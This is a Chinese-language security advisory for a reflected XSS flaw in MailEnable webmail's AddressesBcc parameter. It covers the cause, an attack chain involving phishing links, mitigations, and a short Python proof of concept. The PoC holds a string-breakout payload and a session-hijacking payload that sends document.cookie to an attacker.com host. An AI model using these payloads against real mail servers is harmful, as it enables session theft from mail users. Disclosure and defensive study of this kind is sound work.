CVE-2025-34398 MailEnable AddressesBcc参数反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-34398

漏洞类型

反射型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

MailEnable

漏洞概述

CVE-2025-34398是MailEnable邮件服务器产品中的一个中危反射型跨站脚本(XSS)漏洞。该漏洞存在于MailEnable的Web邮件界面组件中，具体位置为/Mondo/lang/sys/Forms/AddressBook.aspx页面的AddressesBcc参数。攻击者可以通过精心构造的恶意URL链接，当受害者访问该链接时，AddressesBcc参数值未经适当过滤即被直接反射到页面响应中，并嵌入到JavaScript代码块的var sAddrBcc变量内。成功利用此漏洞，攻击者能够在受害者浏览器中执行任意JavaScript代码，从而实现窃取用户会话Cookie（特别是非HttpOnly类型）、重定向用户至恶意网站、模拟用户执行操作（如发送邮件）等攻击目的。由于该漏洞利用需要用户交互（点击恶意链接），因此攻击复杂度较低，但一旦成功实施，将对邮件系统的机密性和完整性造成威胁。受影响版本为MailEnable 10.54之前的版本，建议用户尽快升级至最新修复版本。

技术细节

漏洞根源在于AddressBook.aspx页面处理AddressesBcc参数时缺乏输入验证。该参数值通过GET请求传入后，直接被拼接到页面HTML源码中的JavaScript代码段，具体表现为：var sAddrBcc='[user_input]'; 攻击者可利用这一特性，通过构造特殊的payload（如：';alert(document.cookie);var a='）来突破当前的JavaScript字符串上下文，终止LoadCurAddresses()函数的执行，注入恶意脚本代码，并使用注释符（如//）屏蔽后续代码。当受害者在已登录MailEnable Web邮件系统的情况下访问攻击者提供的恶意链接时，恶意JavaScript代码会在受害者浏览器中执行。由于MailEnable的会话Cookie未设置HttpOnly属性，攻击者可直接通过document.cookie获取用户会话凭证，进而劫持用户会话或执行其他恶意操作。修复方案为在服务器端对AddressesBcc参数进行严格的输入过滤和输出编码，确保用户输入不会作为可执行代码被浏览器解析。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标使用MailEnable邮件服务器，并确认其版本低于10.54

STEP 2

步骤2: 构造恶意URL

攻击者构造包含XSS payload的恶意URL，将AddressesBcc参数值设为';alert(document.cookie);var a='，该payload用于终止LoadCurAddresses()函数并注入恶意JavaScript代码

STEP 3

步骤3: 社会工程攻击

攻击者通过钓鱼邮件、即时消息或其他渠道诱使已登录MailEnable Web邮件系统的受害者点击恶意链接

STEP 4

步骤4: 漏洞触发

受害者浏览器向服务器发送GET请求，AddressesBcc参数值未经过滤被反射到响应页面的JavaScript代码中

STEP 5

步骤5: 恶意脚本执行

浏览器解析HTML时，恶意payload被当作有效JavaScript代码执行，成功注入的alert(document.cookie)被执行，弹出当前用户的Cookie信息

STEP 6

步骤6: 会话劫持

攻击者获取受害者Cookie后，可利用非HttpOnly Cookie进行会话劫持，以受害者身份执行操作如发送邮件、访问敏感信息等

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import urllib.parse

# CVE-2025-34398 PoC - MailEnable Reflected XSS in AddressesBcc Parameter
# Target: MailEnable < 10.54
# Attack Vector: Reflected XSS via AddressesBcc parameter in AddressBook.aspx

target_url = "http://target-server/Mondo/lang/sys/Forms/AddressBook.aspx"

# Malicious payload that terminates LoadCurAddresses(), injects arbitrary JS, and comments out remaining code
# Payload: ';alert(document.cookie);var a='
payload = "';alert(document.cookie);var a='"
encoded_payload = urllib.parse.quote(payload)

# Construct malicious URL
malicious_url = f"{target_url}?AddressesBcc={encoded_payload}"

print("[+] CVE-2025-34398 Reflected XSS PoC")
print(f"[+] Target: {target_url}")
print(f"[+] Malicious URL:")
print(malicious_url)
print("\n[+] Attack Scenario:")
print("1. Attacker crafts a malicious URL with XSS payload in AddressesBcc parameter")
print("2. Victim clicks the link while logged into MailEnable webmail")
print("3. Payload is reflected in JavaScript variable 'var sAddrBcc'")
print("4. Malicious JavaScript executes in victim's browser")
print("5. Attacker steals session cookies or performs actions as the victim")

# Alternative payload for session hijacking
session_hijack_payload = "';var img=new Image();img.src='http://attacker.com/log?c='+document.cookie;var a='"
print(f"\n[+] Session Hijacking Payload:")
print(urllib.parse.quote(session_hijack_payload))

影响范围

MailEnable < 10.54

防御指南

临时缓解措施

在官方修复版本发布之前，可采取以下临时缓解措施：1) 使用Web应用防火墙对AddressBook.aspx页面请求进行过滤，拦截包含XSS特征的请求参数；2) 临时禁用/Mondo/lang/sys/Forms/AddressBook.aspx页面的访问，或限制仅授权用户访问；3) 为所有认证相关的Cookie设置HttpOnly和Secure属性；4) 加强对用户的安全意识培训，提醒不要点击来源不明的链接；5) 监控Web服务器日志，排查异常的AddressesBcc参数请求。